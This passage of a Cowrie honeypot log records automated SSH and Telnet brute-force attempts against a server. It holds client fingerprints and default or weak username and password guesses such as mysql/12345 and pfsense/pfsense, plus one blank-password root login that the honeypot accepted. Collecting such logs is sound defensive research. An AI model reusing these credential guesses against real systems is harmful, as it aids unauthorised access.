{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:19:41.804242Z","src_ip":"212.227.125.160","session":"36c701840731"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:19:41.954962Z","src_ip":"212.227.125.160","session":"36c701840731"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"12345","message":"login attempt [mysql/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:19:42.624127Z","src_ip":"212.227.125.160","session":"36c701840731"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:19:43.794441Z","src_ip":"212.227.125.160","session":"36c701840731"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:19:46.368403Z","src_ip":"212.227.125.160","session":"7e7465fd63d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51896,"dst_ip":"1.2.3.4","dst_port":22,"session":"da6205925a80","protocol":"ssh","message":"New connection: 212.227.125.160:51896 (1.2.3.4:22) [session: da6205925a80]","sensor":"my-vps","timestamp":"2025-08-28T12:20:24.246888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:20:24.249073Z","src_ip":"212.227.125.160","session":"da6205925a80"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:20:24.415269Z","src_ip":"212.227.125.160","session":"da6205925a80"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"12345678","message":"login attempt [mysql/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T12:20:25.545492Z","src_ip":"212.227.125.160","session":"da6205925a80"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:20:26.717224Z","src_ip":"212.227.125.160","session":"da6205925a80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43160,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e15e975fd1a","protocol":"ssh","message":"New connection: 212.227.125.160:43160 (1.2.3.4:22) [session: 1e15e975fd1a]","sensor":"my-vps","timestamp":"2025-08-28T12:21:06.769564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:21:06.770745Z","src_ip":"212.227.125.160","session":"1e15e975fd1a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:21:06.946955Z","src_ip":"212.227.125.160","session":"1e15e975fd1a"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"qwerty","message":"login attempt [mysql/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T12:21:07.828088Z","src_ip":"212.227.125.160","session":"1e15e975fd1a"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:21:09.007637Z","src_ip":"212.227.125.160","session":"1e15e975fd1a"}
{"eventid":"cowrie.session.connect","src_ip":"77.90.185.47","src_port":53622,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff5eebcb2c46","protocol":"ssh","message":"New connection: 77.90.185.47:53622 (1.2.3.4:22) [session: ff5eebcb2c46]","sensor":"my-vps","timestamp":"2025-08-28T12:21:10.484776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:21:10.689299Z","src_ip":"77.90.185.47","session":"ff5eebcb2c46"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T12:21:10.690854Z","src_ip":"77.90.185.47","session":"ff5eebcb2c46"}
{"eventid":"cowrie.login.failed","username":"pfsense","password":"pfsense","message":"login attempt [pfsense/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T12:21:11.210529Z","src_ip":"77.90.185.47","session":"ff5eebcb2c46"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:21:12.229801Z","src_ip":"77.90.185.47","session":"ff5eebcb2c46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35152,"dst_ip":"1.2.3.4","dst_port":22,"session":"db84b229fd46","protocol":"ssh","message":"New connection: 212.227.125.160:35152 (1.2.3.4:22) [session: db84b229fd46]","sensor":"my-vps","timestamp":"2025-08-28T12:21:49.187708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:21:49.188834Z","src_ip":"212.227.125.160","session":"db84b229fd46"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:21:49.524350Z","src_ip":"212.227.125.160","session":"db84b229fd46"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123123","message":"login attempt [mysql/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:21:50.069179Z","src_ip":"212.227.125.160","session":"db84b229fd46"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:21:51.381369Z","src_ip":"212.227.125.160","session":"db84b229fd46"}
{"eventid":"cowrie.session.connect","src_ip":"125.229.244.197","src_port":52875,"dst_ip":"1.2.3.4","dst_port":23,"session":"8444bf87cfff","protocol":"telnet","message":"New connection: 125.229.244.197:52875 (1.2.3.4:23) [session: 8444bf87cfff]","sensor":"my-vps","timestamp":"2025-08-28T12:22:19.096141Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41496,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2a1a140aee6","protocol":"ssh","message":"New connection: 212.227.125.160:41496 (1.2.3.4:22) [session: e2a1a140aee6]","sensor":"my-vps","timestamp":"2025-08-28T12:22:30.182233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:22:30.183514Z","src_ip":"212.227.125.160","session":"e2a1a140aee6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:22:30.352242Z","src_ip":"212.227.125.160","session":"e2a1a140aee6"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"111111","message":"login attempt [mysql/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T12:22:30.860518Z","src_ip":"212.227.125.160","session":"e2a1a140aee6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:22:32.042834Z","src_ip":"212.227.125.160","session":"e2a1a140aee6"}
{"eventid":"cowrie.session.closed","duration":30.652581691741943,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:22:49.748652Z","src_ip":"125.229.244.197","session":"8444bf87cfff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43328,"dst_ip":"1.2.3.4","dst_port":22,"session":"fefcff0f41f7","protocol":"ssh","message":"New connection: 212.227.235.229:43328 (1.2.3.4:22) [session: fefcff0f41f7]","sensor":"my-vps","timestamp":"2025-08-28T12:22:52.003248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:22:52.610099Z","src_ip":"212.227.235.229","session":"fefcff0f41f7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T12:22:52.610754Z","src_ip":"212.227.235.229","session":"fefcff0f41f7"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:23:00.089062Z","src_ip":"212.227.235.229","session":"fefcff0f41f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48304,"dst_ip":"1.2.3.4","dst_port":22,"session":"e19750e07b0c","protocol":"ssh","message":"New connection: 212.227.125.160:48304 (1.2.3.4:22) [session: e19750e07b0c]","sensor":"my-vps","timestamp":"2025-08-28T12:23:09.219330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:23:09.220162Z","src_ip":"212.227.125.160","session":"e19750e07b0c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:23:09.394017Z","src_ip":"212.227.125.160","session":"e19750e07b0c"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"1234567","message":"login attempt [mysql/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T12:23:09.911482Z","src_ip":"212.227.125.160","session":"e19750e07b0c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:23:11.142774Z","src_ip":"212.227.125.160","session":"e19750e07b0c"}
{"eventid":"cowrie.session.connect","src_ip":"47.253.227.124","src_port":51644,"dst_ip":"1.2.3.4","dst_port":22,"session":"313374691be7","protocol":"ssh","message":"New connection: 47.253.227.124:51644 (1.2.3.4:22) [session: 313374691be7]","sensor":"my-vps","timestamp":"2025-08-28T12:23:20.016570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:23:20.017471Z","src_ip":"47.253.227.124","session":"313374691be7"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:23:20.121106Z","src_ip":"47.253.227.124","session":"313374691be7"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:23:20.435681Z","src_ip":"47.253.227.124","session":"313374691be7"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:23:20.540734Z","src_ip":"47.253.227.124","session":"313374691be7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58310,"dst_ip":"1.2.3.4","dst_port":22,"session":"611afa2a8405","protocol":"ssh","message":"New connection: 212.227.125.160:58310 (1.2.3.4:22) [session: 611afa2a8405]","sensor":"my-vps","timestamp":"2025-08-28T12:23:49.226370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:23:49.227403Z","src_ip":"212.227.125.160","session":"611afa2a8405"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-c